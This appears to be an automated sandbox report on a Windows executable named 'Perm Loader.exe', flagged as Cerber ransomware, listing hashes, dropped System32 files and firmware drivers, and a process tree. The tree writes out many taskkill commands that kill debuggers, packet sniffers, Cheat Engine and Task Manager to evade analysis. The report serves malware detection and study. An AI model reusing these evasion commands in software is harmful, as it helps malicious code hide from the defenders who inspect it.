cerber | 3b3b6bc308e28e71b72cd2d206243ea6d853506c972a95638299c1ff30581015

Analysis

max time kernel
100s
max time network
103s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26-12-2024 20:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Perm Loader.exe
Size

1.7MB
MD5

3292a5cefd93bed0c7696e2f08a31be8
SHA1

d9947b9bee3ce3bc9f4317682190d93ab9c691b1
SHA256

3b3b6bc308e28e71b72cd2d206243ea6d853506c972a95638299c1ff30581015
SHA512

2f940b48fff8f9010f8e9e4944093de085fd62a82cc2fc0caa34441cc2f6d5bf66672e6cdbcb63c286bdc008d2300e50dc4b47b194a174525ddd8ca732a49f0b
SSDEEP

24576:E7vwe+8ljws5G8Nc9sOgSNMMFJAyAL+3Xw2PP6MReN/IAUqNOmNAFwa/k:EgqdG8Nc9sOxtJVw2nzA3s/

Score

10^/10

cerber ransomware

Malware Config

Signatures

Cerber 64 IoCs

Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.

ransomware cerber

description	ioc	pid	Process
		1784	taskkill.exe
		4868	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AFUWINx64.EXE
		1324	taskkill.exe
		468	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		4000	taskkill.exe
		4596	taskkill.exe
		2056	taskkill.exe
		1824	taskkill.exe
		3772	taskkill.exe
		4524	taskkill.exe
		740	taskkill.exe
		3588	taskkill.exe
		2900	taskkill.exe
		2748	taskkill.exe
		3364	taskkill.exe
		4000	taskkill.exe
		1512	taskkill.exe
		2416	taskkill.exe
		1876	taskkill.exe
		1604	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AFUWINx64.EXE
		452	taskkill.exe
		5000	taskkill.exe
		232	taskkill.exe
		2020	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		3220	taskkill.exe
		3216	taskkill.exe
		3320	taskkill.exe
		1824	taskkill.exe
		3696	taskkill.exe
		4456	taskkill.exe
		4208	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		1696	taskkill.exe
		628	taskkill.exe
		3216	taskkill.exe
		468	taskkill.exe
		3576	taskkill.exe
		1660	taskkill.exe
		5104	taskkill.exe
		4880	taskkill.exe
		656	taskkill.exe
		4584	taskkill.exe
		3904	taskkill.exe
		4844	taskkill.exe
Mutant created	AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8}		AMIDEWINx64.EXE
		4332	taskkill.exe
		1744	taskkill.exe
		1360	taskkill.exe
		2968	taskkill.exe
		3708	taskkill.exe
		4300	taskkill.exe
		1952	taskkill.exe
		1772	taskkill.exe
		4440	taskkill.exe
		2512	taskkill.exe
		4724	taskkill.exe
		2756	taskkill.exe
		3188	taskkill.exe
		2572	taskkill.exe

Cerber family
cerber

Executes dropped EXE 26 IoCs

pid	Process
5000	AMIDEWINx64.EXE
3092	AMIDEWINx64.EXE
4200	AMIDEWINx64.EXE
1540	AMIDEWINx64.EXE
3344	AMIDEWINx64.EXE
5036	AMIDEWINx64.EXE
1388	AMIDEWINx64.EXE
1420	AMIDEWINx64.EXE
1132	AMIDEWINx64.EXE
1748	AMIDEWINx64.EXE
1512	AMIDEWINx64.EXE
4428	AMIDEWINx64.EXE
740	AMIDEWINx64.EXE
3236	AMIDEWINx64.EXE
4344	AMIDEWINx64.EXE
2756	AMIDEWINx64.EXE
2416	AMIDEWINx64.EXE
1204	AMIDEWINx64.EXE
2608	AMIDEWINx64.EXE
4724	AMIDEWINx64.EXE
4972	AMIDEWINx64.EXE
4996	AMIDEWINx64.EXE
1416	AFUWINx64.EXE
2868	AFUWINx64.EXE
2580	AFUWINx64.EXE
1512	AFUWINx64.EXE

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Mac.bat	curl.exe
File created	C:\Windows\System32\amifldrv64.sys	Perm Loader.exe
File created	C:\Windows\System32\AMIDEWINx64.EXE	Perm Loader.exe
File created	C:\Windows\System32\amigendrv64.sys	Perm Loader.exe
File created	C:\Windows\System32\AFUWINx64.EXE	Perm Loader.exe
File created	C:\Windows\System32\Tasks\Mac.bat	curl.exe
File opened for modification	C:\Windows\System32\amigendrv64.sys	Perm Loader.exe
File opened for modification	C:\Windows\System32\AFUWINx64.EXE	Perm Loader.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
1264	taskkill.exe
2976	taskkill.exe
628	taskkill.exe
1860	taskkill.exe
1632	taskkill.exe
4988	taskkill.exe
1900	taskkill.exe
3332	taskkill.exe
2184	taskkill.exe
3964	taskkill.exe
3096	taskkill.exe
1164	taskkill.exe
936	taskkill.exe
4380	taskkill.exe
4568	taskkill.exe
5036	taskkill.exe
1696	taskkill.exe
4844	taskkill.exe
3496	taskkill.exe
2708	taskkill.exe
1324	taskkill.exe
1744	taskkill.exe
4932	taskkill.exe
4796	taskkill.exe
3052	taskkill.exe
2196	taskkill.exe
1936	taskkill.exe
1372	taskkill.exe
5028	taskkill.exe
2308	taskkill.exe
3488	taskkill.exe
1632	taskkill.exe
3092	taskkill.exe
1660	taskkill.exe
2108	taskkill.exe
452	taskkill.exe
1056	taskkill.exe
4600	taskkill.exe
5056	taskkill.exe
3220	taskkill.exe
4436	taskkill.exe
2760	taskkill.exe
952	taskkill.exe
3364	taskkill.exe
1296	taskkill.exe
4588	taskkill.exe
1952	taskkill.exe
1004	taskkill.exe
1996	taskkill.exe
4800	taskkill.exe
1752	taskkill.exe
1012	taskkill.exe
3800	taskkill.exe
3320	taskkill.exe
468	taskkill.exe
2196	taskkill.exe
3904	taskkill.exe
4576	taskkill.exe
1316	taskkill.exe
1372	taskkill.exe
232	taskkill.exe
1424	taskkill.exe
5056	taskkill.exe
3352	taskkill.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe
3016	Perm Loader.exe

Suspicious behavior: LoadsDriver 26 IoCs

pid	Process
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found
660	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4016	taskkill.exe
Token: SeDebugPrivilege	2860	taskkill.exe
Token: SeDebugPrivilege	2756	taskkill.exe
Token: SeDebugPrivilege	1660	taskkill.exe
Token: SeDebugPrivilege	3564	taskkill.exe
Token: SeDebugPrivilege	2572	taskkill.exe
Token: SeDebugPrivilege	1624	taskkill.exe
Token: SeDebugPrivilege	5052	taskkill.exe
Token: SeDebugPrivilege	4100	taskkill.exe
Token: SeDebugPrivilege	3224	taskkill.exe
Token: SeDebugPrivilege	1600	taskkill.exe
Token: SeDebugPrivilege	1952	taskkill.exe
Token: SeDebugPrivilege	4012	taskkill.exe
Token: SeDebugPrivilege	1236	taskkill.exe
Token: SeDebugPrivilege	2748	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeDebugPrivilege	4844	taskkill.exe
Token: SeDebugPrivilege	2540	taskkill.exe
Token: SeDebugPrivilege	3584	taskkill.exe
Token: SeDebugPrivilege	4576	taskkill.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	528	taskkill.exe
Token: SeDebugPrivilege	5056	taskkill.exe
Token: SeDebugPrivilege	1316	taskkill.exe
Token: SeDebugPrivilege	1536	taskkill.exe
Token: SeDebugPrivilege	3504	taskkill.exe
Token: SeDebugPrivilege	1612	taskkill.exe
Token: SeDebugPrivilege	1512	taskkill.exe
Token: SeDebugPrivilege	2472	taskkill.exe
Token: SeDebugPrivilege	4688	taskkill.exe
Token: SeDebugPrivilege	3588	taskkill.exe
Token: SeDebugPrivilege	972	taskkill.exe
Token: SeDebugPrivilege	4156	taskkill.exe
Token: SeDebugPrivilege	2348	taskkill.exe
Token: SeDebugPrivilege	3508	taskkill.exe
Token: SeDebugPrivilege	3220	taskkill.exe
Token: SeDebugPrivilege	2416	taskkill.exe
Token: SeDebugPrivilege	3384	taskkill.exe
Token: SeDebugPrivilege	3216	taskkill.exe
Token: SeDebugPrivilege	3964	taskkill.exe
Token: SeDebugPrivilege	1204	taskkill.exe
Token: SeDebugPrivilege	3696	taskkill.exe
Token: SeDebugPrivilege	3748	taskkill.exe
Token: SeDebugPrivilege	2196	taskkill.exe
Token: SeDebugPrivilege	4972	taskkill.exe
Token: SeDebugPrivilege	3224	taskkill.exe
Token: SeDebugPrivilege	2552	taskkill.exe
Token: SeDebugPrivilege	1372	taskkill.exe
Token: SeDebugPrivilege	4548	taskkill.exe
Token: SeDebugPrivilege	468	taskkill.exe
Token: SeDebugPrivilege	3096	taskkill.exe
Token: SeDebugPrivilege	656	taskkill.exe
Token: SeDebugPrivilege	4300	taskkill.exe
Token: SeDebugPrivilege	4604	taskkill.exe
Token: SeDebugPrivilege	1164	taskkill.exe
Token: SeDebugPrivilege	3348	taskkill.exe
Token: SeDebugPrivilege	876	taskkill.exe
Token: SeDebugPrivilege	1824	taskkill.exe
Token: SeDebugPrivilege	1360	taskkill.exe
Token: SeDebugPrivilege	232	taskkill.exe
Token: SeDebugPrivilege	1420	taskkill.exe
Token: SeDebugPrivilege	4780	taskkill.exe
Token: SeDebugPrivilege	3320	taskkill.exe
Token: SeDebugPrivilege	1424	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3016 wrote to memory of 3936	3016	Perm Loader.exe	84
PID 3016 wrote to memory of 3936	3016	Perm Loader.exe	84
PID 3936 wrote to memory of 4016	3936	cmd.exe	85
PID 3936 wrote to memory of 4016	3936	cmd.exe	85
PID 3016 wrote to memory of 2416	3016	Perm Loader.exe	87
PID 3016 wrote to memory of 2416	3016	Perm Loader.exe	87
PID 2416 wrote to memory of 2860	2416	cmd.exe	88
PID 2416 wrote to memory of 2860	2416	cmd.exe	88
PID 3016 wrote to memory of 2036	3016	Perm Loader.exe	89
PID 3016 wrote to memory of 2036	3016	Perm Loader.exe	89
PID 2036 wrote to memory of 2756	2036	cmd.exe	90
PID 2036 wrote to memory of 2756	2036	cmd.exe	90
PID 3016 wrote to memory of 3716	3016	Perm Loader.exe	91
PID 3016 wrote to memory of 3716	3016	Perm Loader.exe	91
PID 3716 wrote to memory of 1660	3716	cmd.exe	92
PID 3716 wrote to memory of 1660	3716	cmd.exe	92
PID 3016 wrote to memory of 464	3016	Perm Loader.exe	93
PID 3016 wrote to memory of 464	3016	Perm Loader.exe	93
PID 464 wrote to memory of 3564	464	cmd.exe	94
PID 464 wrote to memory of 3564	464	cmd.exe	94
PID 3016 wrote to memory of 2712	3016	Perm Loader.exe	95
PID 3016 wrote to memory of 2712	3016	Perm Loader.exe	95
PID 2712 wrote to memory of 2572	2712	cmd.exe	96
PID 2712 wrote to memory of 2572	2712	cmd.exe	96
PID 3016 wrote to memory of 4700	3016	Perm Loader.exe	97
PID 3016 wrote to memory of 4700	3016	Perm Loader.exe	97
PID 4700 wrote to memory of 1624	4700	cmd.exe	98
PID 4700 wrote to memory of 1624	4700	cmd.exe	98
PID 3016 wrote to memory of 2196	3016	Perm Loader.exe	99
PID 3016 wrote to memory of 2196	3016	Perm Loader.exe	99
PID 2196 wrote to memory of 5052	2196	cmd.exe	100
PID 2196 wrote to memory of 5052	2196	cmd.exe	100
PID 3016 wrote to memory of 4880	3016	Perm Loader.exe	101
PID 3016 wrote to memory of 4880	3016	Perm Loader.exe	101
PID 3016 wrote to memory of 4572	3016	Perm Loader.exe	102
PID 3016 wrote to memory of 4572	3016	Perm Loader.exe	102
PID 4572 wrote to memory of 4100	4572	cmd.exe	103
PID 4572 wrote to memory of 4100	4572	cmd.exe	103
PID 3016 wrote to memory of 3772	3016	Perm Loader.exe	104
PID 3016 wrote to memory of 3772	3016	Perm Loader.exe	104
PID 3772 wrote to memory of 3224	3772	cmd.exe	105
PID 3772 wrote to memory of 3224	3772	cmd.exe	105
PID 3016 wrote to memory of 1364	3016	Perm Loader.exe	106
PID 3016 wrote to memory of 1364	3016	Perm Loader.exe	106
PID 1364 wrote to memory of 1600	1364	cmd.exe	107
PID 1364 wrote to memory of 1600	1364	cmd.exe	107
PID 3016 wrote to memory of 936	3016	Perm Loader.exe	108
PID 3016 wrote to memory of 936	3016	Perm Loader.exe	108
PID 936 wrote to memory of 1952	936	cmd.exe	109
PID 936 wrote to memory of 1952	936	cmd.exe	109
PID 3016 wrote to memory of 1872	3016	Perm Loader.exe	110
PID 3016 wrote to memory of 1872	3016	Perm Loader.exe	110
PID 1872 wrote to memory of 4012	1872	cmd.exe	111
PID 1872 wrote to memory of 4012	1872	cmd.exe	111
PID 3016 wrote to memory of 2404	3016	Perm Loader.exe	112
PID 3016 wrote to memory of 2404	3016	Perm Loader.exe	112
PID 2404 wrote to memory of 1236	2404	cmd.exe	113
PID 2404 wrote to memory of 1236	2404	cmd.exe	113
PID 3016 wrote to memory of 636	3016	Perm Loader.exe	114
PID 3016 wrote to memory of 636	3016	Perm Loader.exe	114
PID 636 wrote to memory of 1004	636	cmd.exe	115
PID 636 wrote to memory of 1004	636	cmd.exe	115
PID 3016 wrote to memory of 3372	3016	Perm Loader.exe	116
PID 3016 wrote to memory of 3372	3016	Perm Loader.exe	116

C:\Users\Admin\AppData\Local\Temp\Perm Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Perm Loader.exe"
1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3936
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2416
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2036
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3716
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:464
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4700
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2196
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4572
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3772
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1364
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:936
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1872
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2404
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:636
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    - Kills process with taskkill
    PID:1004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:3372
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:3512
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:1500
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:1092
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:4500
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:3488
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:5036
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:2332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:3464
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:2456
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:232
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:1548
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4956
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:4428
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4868
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:1800
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:1948
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:4280
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:3188
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:3588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:1504
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3556
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4988
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4596
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:4216
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:2860
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3052
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4052
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:3216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:3544
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:4920
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:2056
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:3696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:2636
- - C:\Windows\system32\taskkill.exe
